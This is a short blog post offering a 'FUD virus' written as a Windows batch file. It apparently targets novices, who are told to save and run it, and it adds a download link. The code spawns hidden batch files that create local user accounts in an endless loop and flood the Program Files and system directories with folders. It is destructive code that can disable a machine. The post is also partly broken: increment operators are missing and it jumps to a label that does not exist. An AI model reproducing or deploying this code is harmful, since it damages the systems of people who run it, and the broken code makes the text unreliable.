Monday, May 27

Create a FUD Virus in Notepad

Hi friends,
I am back with a BIG Surprise for you all.
Today, I will Show you to create a FUD Virus.


Well, you all might be aware of what virus is.
For those who don't know about virus.
Here, is the short description about it -

VIRUS

A program with malicious piece of codes that aims to defect a computer or a program or an entire network.

For more information, check out this -

Lets Begin -

First of all, the FUD Virus will created in notepad.
So, you might have guess that it a Virus in BAtch file.

Here is the code,

[CODE]


@ECHO OFF
@ECHO A nAuthority Creation
@ECHO MAIN BAT RUNNING

GOTO start

:start
@ECHO SET magic2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a magic2=%%magic2%% 1 >> bat6.bat
@ECHO NET USER magic2%%magic2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat

GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\\ >> bat5.bat
@ECHO SET pogo=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR pogo%%pogo%% >> bat5.bat
@ECHO SET /a pogo=%%pogo%% 1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat

GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\\ >> bat4.bat
@ECHO SET hat=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR hat%%hat%% >> bat4.bat
@ECHO SET /a hat=%%hat%% 1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3


Now, save it as nAFUDVirus.bat
And, You're DONE!

For those who don't know or have error while compiling it.
Download Link - Click Here


Well, you all loved this virus.
If you have any error or doubts regarding the same.
Please feel free to mention it in comments below.
Thanks

No comments:

Post a Comment

Enter your Comment...